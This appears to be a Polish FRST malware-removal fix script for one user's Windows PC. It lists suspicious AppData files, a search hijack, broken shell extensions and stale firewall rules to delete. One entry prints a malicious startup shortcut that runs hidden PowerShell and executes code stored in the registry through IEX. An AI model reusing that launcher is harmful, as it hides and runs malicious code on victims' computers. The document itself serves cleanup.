CloseProcesses: CreateRestorePoint: EmptyTemp: VirusTotal: C:\Users\Artur\AppData\Roaming\UIiY.dll VirusTotal: C:\Users\Artur\AppData\Roaming\inst.exe VirusTotal: C:\Windows\SysWOW64\srvany.exe Startup: C:\Users\Artur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iexplorer.lnk [2019-01-12] ShortcutAndArgument: iexplorer.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe => -W Hidden -Exec -nop $t=Get-ItemProperty -Path 'HKCU:\Software\Classes\mssccfile' -Name t;IEX $t.t; GroupPolicy: Ograniczenia ? <==== UWAGA Task: {11E65B93-AEF4-4A3E-B690-5AEE99FF89FE} - System32\Tasks\Opera scheduled Autoupdate 1449506344 => C:\Program Files (x86)\Opera\launcher.exe [1351192 2020-02-05] (Opera Software AS -> Opera Software) Task: {3A3EC64D-CA0E-4743-BF9C-913544FB6EB2} - System32\Tasks\Maxthon Update => C:\Program Files (x86)\Maxthon\Bin\Maxthon.exe Task: {46751A70-7B7E-430F-B28D-9EAD02CF67DD} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1873288 2019-09-19] (AVAST Software s.r.o. -> AVAST Software) Task: {DD137531-3FE2-4DE0-860A-369B47E2A215} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Brak pliku <==== UWAGA Task: {E54C8E60-6055-4D1F-A47D-C3D181CC533A} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku <==== UWAGA Tcpip\..\Interfaces\{f0e87d3f-da7c-4cf4-91a0-eedb69d6c765}: [DhcpNameServer] 192.168.1.1 HKU\S-1-5-21-994253839-1061340512-3705332430-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.gazeta.pl/0,0.html?p=190 HKU\S-1-5-21-994253839-1061340512-3705332430-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp SearchScopes: HKU\S-1-5-21-994253839-1061340512-3705332430-1001 -> DefaultScope {1BBAAAD7-8B68-4BB1-8882-366A0EF05A68} URL = hxxp://www.nav-pl.com/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-994253839-1061340512-3705332430-1001 -> {1BBAAAD7-8B68-4BB1-8882-366A0EF05A68} URL = hxxp://www.nav-pl.com/search?q={searchTerms} FF Extension: (Brak nazwy) - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [nie znaleziono] S2 KMService; C:\Windows\SysWOW64\srvany.exe [8192 2015-12-07] () [Brak podpisu cyfrowego] S3 LeCrud64; \??\C:\PROGRA~3\Lenovo\SYSTEM~1\SESSIO~1\REPOSI~1\9SJY9C~1\LeCrud64.sys [X] 2020-02-07 11:45 - 2019-06-17 20:47 - 000003982 _____ C:\WINDOWS\system32\Tasks\Opera scheduled Autoupdate 1449506344 CustomCLSID: HKU\S-1-5-21-994253839-1061340512-3705332430-1001_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 -> C:\Users\Artur\AppData\Local\Microsoft\OneDrive\17.3.7074.1023\amd64\FileSyncShell64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-994253839-1061340512-3705332430-1001_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 -> C:\Users\Artur\AppData\Local\Microsoft\OneDrive\17.3.7074.1023\amd64\FileSyncShell64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-994253839-1061340512-3705332430-1001_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32 -> C:\Users\Artur\AppData\Local\Microsoft\OneDrive\17.3.7074.1023\amd64\FileSyncShell64.dll => Brak pliku ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Brak pliku ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Brak pliku ContextMenuHandlers1: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> Brak pliku ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> Brak pliku ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => -> Brak pliku ContextMenuHandlers1: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} => -> Brak pliku ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} => -> Brak pliku ContextMenuHandlers4: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> Brak pliku ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> Brak pliku ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => -> Brak pliku ContextMenuHandlers6: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} => -> Brak pliku AlternateDataStreams: C:\ProgramData\TEMP:7F4E393D [113] HKU\S-1-5-21-994253839-1061340512-3705332430-1001\Software\Classes\exefile: <==== UWAGA FirewallRules: [{143AE15F-F901-4B1C-B6E3-E963D6B43318}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.109.383.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku FirewallRules: [{148D9675-00B5-46EA-8132-E44A66015CD6}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.109.383.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku FirewallRules: [{73AC28AF-FE5C-4E49-A51B-E7D05E8A978B}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.109.383.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku FirewallRules: [{F5D9BE33-67F0-4C9C-B02F-64881FE4E229}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.109.383.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku FirewallRules: [{2A8C84D9-02F3-4585-9C24-574F6497784B}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.109.383.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku FirewallRules: [{2494898E-6C45-4A5F-AC44-448B6BC0914A}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.109.383.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku FirewallRules: [{40F81793-E5FB-4E64-ADAE-E4B82FCC55B4}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.109.383.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku FirewallRules: [{4A3E13A7-9E58-468A-8D41-C8146E4777CF}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.109.383.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku FirewallRules: [UDP Query User{B777C86D-04F4-473F-8FF0-B731A114D43E}D:\windowsapps\spotifyab.spotifymusic_1.108.439.0_x86__zpdnekdrzrea0\spotify.exe] => (Allow) D:\windowsapps\spotifyab.spotifymusic_1.108.439.0_x86__zpdnekdrzrea0\spotify.exe Brak pliku FirewallRules: [TCP Query User{351788B2-828A-469F-A936-00FD57A125FF}D:\windowsapps\spotifyab.spotifymusic_1.108.439.0_x86__zpdnekdrzrea0\spotify.exe] => (Allow) D:\windowsapps\spotifyab.spotifymusic_1.108.439.0_x86__zpdnekdrzrea0\spotify.exe Brak pliku FirewallRules: [{32DE452E-6269-4B93-83DD-8C21580348CE}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.108.439.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku FirewallRules: [{F4D7340E-3A20-469C-8163-E8B6923F65C0}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.108.439.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku FirewallRules: [{3011BF6E-48F8-4D4D-8A06-AA7B4CEC1C14}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.108.439.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku FirewallRules: [{CD5C13DE-DD67-4BB5-B345-1226B29103CC}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.108.439.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku FirewallRules: [{6D6DC441-8FF7-44C1-A9F2-CC0B5A8046C7}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.108.439.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku FirewallRules: [{68B76526-C914-4856-AB7D-E0FDDAAE9BAF}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.108.439.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku FirewallRules: [{61A75FC0-E97E-419B-A95D-1D2CCFF9B7FE}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.108.439.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku FirewallRules: [{07EC8C52-C961-48A7-AA36-7CF6790C0AEC}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.108.439.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku FirewallRules: [TCP Query User{39270B4C-453F-4A7A-80C2-91E30E623231}C:\users\artur\desktop\ip01r_01h_06r_26h_cd\serach tool\ipcam3.6.exe] => (Allow) C:\users\artur\desktop\ip01r_01h_06r_26h_cd\serach tool\ipcam3.6.exe Brak pliku FirewallRules: [UDP Query User{12A5F006-9F6D-405F-9CFD-39333BBD78C4}C:\users\artur\desktop\ip01r_01h_06r_26h_cd\serach tool\ipcam3.6.exe] => (Allow) C:\users\artur\desktop\ip01r_01h_06r_26h_cd\serach tool\ipcam3.6.exe Brak pliku FirewallRules: [TCP Query User{104FB589-0287-435D-AB45-3BEB89392A4F}D:\windowsapps\spotifyab.spotifymusic_1.109.383.0_x86__zpdnekdrzrea0\spotify.exe] => (Allow) D:\windowsapps\spotifyab.spotifymusic_1.109.383.0_x86__zpdnekdrzrea0\spotify.exe Brak pliku FirewallRules: [UDP Query User{5FA0BE4F-974F-40C7-A1FE-BA0CC402518B}D:\windowsapps\spotifyab.spotifymusic_1.109.383.0_x86__zpdnekdrzrea0\spotify.exe] => (Allow) D:\windowsapps\spotifyab.spotifymusic_1.109.383.0_x86__zpdnekdrzrea0\spotify.exe Brak pliku FirewallRules: [{2A5C14AD-0850-461E-A370-23E9417AEA3F}] => (Allow) D:\WindowsApps\MUSIXMATCH.LYRICS_3.7.3843.0_x86__7gejyv32yt3te\app\Musixmatch.exe Brak pliku FirewallRules: [{A9E24036-700B-4970-ACEC-C810DF432B9B}] => (Allow) D:\WindowsApps\MUSIXMATCH.LYRICS_3.7.3843.0_x86__7gejyv32yt3te\app\Musixmatch.exe Brak pliku FilesInDirectory: C:\Users\Artur\AppData\Roaming\*.exe;*.dll;*.ini Hosts: RemoveProxy